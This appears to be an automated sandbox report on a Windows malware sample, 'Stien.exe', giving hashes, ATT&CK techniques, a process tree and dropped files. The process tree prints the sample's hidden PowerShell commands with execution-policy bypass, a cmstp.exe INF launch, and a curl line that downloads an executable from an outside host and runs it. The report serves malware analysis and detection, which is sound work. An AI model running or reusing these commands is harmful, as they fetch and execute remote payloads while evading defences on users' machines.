ce8f36cb260a5e3d03fab13624208d531551b5dc82e2097b9dd38707c32852de

Analysis

max time kernel
118s
max time network
122s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
22-05-2024 04:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Stien.exe
Size

48KB
MD5

bda9523d7221942e46def67ed473e33e
SHA1

ce837c7ac128e361217316041891da0872b87290
SHA256

ce8f36cb260a5e3d03fab13624208d531551b5dc82e2097b9dd38707c32852de
SHA512

5e8f0e619d8dfc664a8e833243cda8b4cc638a324590e5f26c3d991cca5b674fe9677449163fcb78dea8b8c27c60e37651e63ec6cfac475e2ca404ca1cef6388
SSDEEP

768:+GJzSq8Maq5s9OIyziuT/2dcWhzzkOFbQBU669RhQM+8M+FG:+RqfKOtiuTuRbQALK

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2252	powershell.exe
2596	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2252	powershell.exe
2252	powershell.exe
2252	powershell.exe
2596	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2188	Stien.exe
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeDebugPrivilege	2596	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2252	powershell.exe
2252	powershell.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2188 wrote to memory of 2252	2188	Stien.exe	28
PID 2188 wrote to memory of 2252	2188	Stien.exe	28
PID 2188 wrote to memory of 2252	2188	Stien.exe	28
PID 2188 wrote to memory of 2252	2188	Stien.exe	28
PID 2252 wrote to memory of 1648	2252	powershell.exe	30
PID 2252 wrote to memory of 1648	2252	powershell.exe	30
PID 2252 wrote to memory of 1648	2252	powershell.exe	30
PID 2252 wrote to memory of 1648	2252	powershell.exe	30
PID 2252 wrote to memory of 1648	2252	powershell.exe	30
PID 2252 wrote to memory of 1648	2252	powershell.exe	30
PID 2252 wrote to memory of 1648	2252	powershell.exe	30
PID 2252 wrote to memory of 2276	2252	powershell.exe	31
PID 2252 wrote to memory of 2276	2252	powershell.exe	31
PID 2252 wrote to memory of 2276	2252	powershell.exe	31
PID 2252 wrote to memory of 2276	2252	powershell.exe	31
PID 2276 wrote to memory of 2756	2276	csc.exe	32
PID 2276 wrote to memory of 2756	2276	csc.exe	32
PID 2276 wrote to memory of 2756	2276	csc.exe	32
PID 2276 wrote to memory of 2756	2276	csc.exe	32
PID 2188 wrote to memory of 2596	2188	Stien.exe	33
PID 2188 wrote to memory of 2596	2188	Stien.exe	33
PID 2188 wrote to memory of 2596	2188	Stien.exe	33
PID 2188 wrote to memory of 2596	2188	Stien.exe	33

C:\Users\Admin\AppData\Local\Temp\Stien.exe
"C:\Users\Admin\AppData\Local\Temp\Stien.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2188
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -WindowStyle Hidden -f C:\Users\Public\D.ps1
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2252
- - C:\Windows\SysWOW64\cmstp.exe
    "cmstp.exe" C:\Users\Public\user.inf /au
    3⤵
    PID:1648
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cdip252q.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2276
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB932.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB931.tmp"
      4⤵
      PID:2756
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -WindowStyle Hidden -c curl.exe 'http://voucher-01-static.com/rkei/Xwemz.exe' -o ('C:\Users\Public\Xwemz.exe');start ('C:\Users\Public\Xwemz.exe')
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESB932.tmp

Filesize
1KB

MD5
0a272a9d9bcf4fd896e3b7e707cfd479

SHA1
346e5e9613169cb689b154e3866f2e05aff8f01d

SHA256
dd4c951df031c9f66ecac3391398770bd8e71c80b7fe56159f59a18cb781f926

SHA512
e0878ac7d8279bb50a633237c21cf3a902412c61234cb9472ff4337d538d80c82b3a6b379359adda32c7c55644977768ed4b30b0b30ffeee910f1e8948afa951

Download Submit
C:\Users\Admin\AppData\Local\Temp\cdip252q.dll

Filesize
3KB

MD5
d1985810ff7dded3255a37506f9595cb

SHA1
696c3c364c671a45728677496b0a58d5e2491566

SHA256
3dcf624267914c729508fb9e01051ea719fe408c11d8c1056a6ab300afe75c2d

SHA512
3af150edaaa2947a5c805ec982f040678f7584aa970d39d2bea005c5c93af585dceb7e236fe9dc8143d84094801a6346872446ceaf69170b99c3b7ed84bfd924

Download Submit
C:\Users\Admin\AppData\Local\Temp\cdip252q.pdb

Filesize
7KB

MD5
525e72f9e8d864fe32f0176711ceb664

SHA1
cc1f7138e45b051665f4c16451163ce750328190

SHA256
45c9e2ecfcfc7ba6751a84a332747e4c51cf16fe20f031db7b49187f4ca64d70

SHA512
a04df3422070778529bb10ca0a5af6ea2d3435e84b9f1699fe64ca2f26ad89cc89e1be0288526d8e8edcf0ce9ab609885b5684802775428ff970c79338f69c1a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
37a777863406cf9d81752523adcb2166

SHA1
4e991d912bcd394a207ad7b67147b4e2b654615d

SHA256
dc1973a2258a436104a4ce31f1f514c53841ca2100d5e0bef1617566995a3f0b

SHA512
a0b852b3b90560b0b98fb84cab8c0b22da9787b241d07fdad2d178d0d0d32188677eaba420de4793826a38b3b4c00e09cc0616d034a71a50b34a29f72833106f

Download Submit
C:\Users\Public\D.ps1

Filesize
978B

MD5
5e299f093daf20a2faa634bf359389f7

SHA1
7675ab67dde92d44d1080a61faa482d848e04007

SHA256
7a246791c8d43bf0e0a325edc12f519b6c14c67d51e30292bea5679d7f452577

SHA512
10025b586f6aeb1bc7bd1dec669ba0f669652fffe8d70282114538e5d02dffc1e6575021ec0e8bdb0f9e7666b0b801f86ce5e9b35ca97dae1a765f0ced881fff

Download Submit
C:\Users\Public\user.inf

Filesize
661B

MD5
4197ebefdb9a5ffb2eb4b8a66b05e286

SHA1
8fbd3815aa7d4cf6494931ababbee9e48f1677d3

SHA256
623a4f0d12503877a7ac09008876510fff9a15a42259fb8993bf5ed65ef8357f

SHA512
4774c17ea50fc44f1f4cf06f5a59bc3f85b640f0f2739461c6206299a3cd523daf4c6a5d87442dbbc5c91366a236d8759a08cbac25a8b12f1ffde285cc3ca43a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCB931.tmp

Filesize
652B

MD5
cb756fd4f7ee7c025cdc9e5ff405e1aa

SHA1
28fef0c7df6ee04ae3036f354a04f7f49e1b6eaa

SHA256
b9370ef8773939ac4ff1a1537cf9e593ff0b311411b38017caa2731b9107f2f3

SHA512
695c69a69f14883cc8e29883e0d753c3107a5f23f77f00eef414140380eecb6d3c3b788e5fce4d797a1d648b090ab1a51ab1ab8b4a0a88da4d3fdb186adac15d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cdip252q.0.cs

Filesize
319B

MD5
f3c09788c53ec7b12e03c328440a57fc

SHA1
898711631c676136cc0576370c705d5bb38df060

SHA256
f52036306d49ca5bc0c58242a311526e4d045dcd070b0981db503da5e3a55212

SHA512
cdddd3ffe6563bcd0ff53973b3a3fe7aca3939b77dcb3fcc2e56d93c9f0727a0d5ffa550a21923ffa8a446da589d68a6c26674068bf75233421452a153b9e1ce

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\cdip252q.cmdline

Filesize
309B

MD5
b4697c015c44d0a6803d474c46eb6feb

SHA1
572c75d06e475f0e89b2b1be4b7872086a7b8ed8

SHA256
774cfa996c462fbaf3b7e8d47f61aa0e49fa78f113f713d6e8cee5db3b3284a7

SHA512
fac02d0e0d8e13e9d913f1174f91e895df80f2ce863998a185bfe49c95115a16f3c15c3f43ae3f661f3dce00c235ed943d02e8167b82cbe5e533483c6632f37c

Download Submit
memory/2188-0-0x0000000074D2E000-0x0000000074D2F000-memory.dmp

Filesize
4KB

Download
memory/2188-4-0x0000000074D20000-0x000000007540E000-memory.dmp

Filesize
6.9MB

Download
memory/2188-24-0x0000000074D20000-0x000000007540E000-memory.dmp

Filesize
6.9MB

Download
memory/2188-1-0x0000000000240000-0x0000000000252000-memory.dmp

Filesize
72KB

Download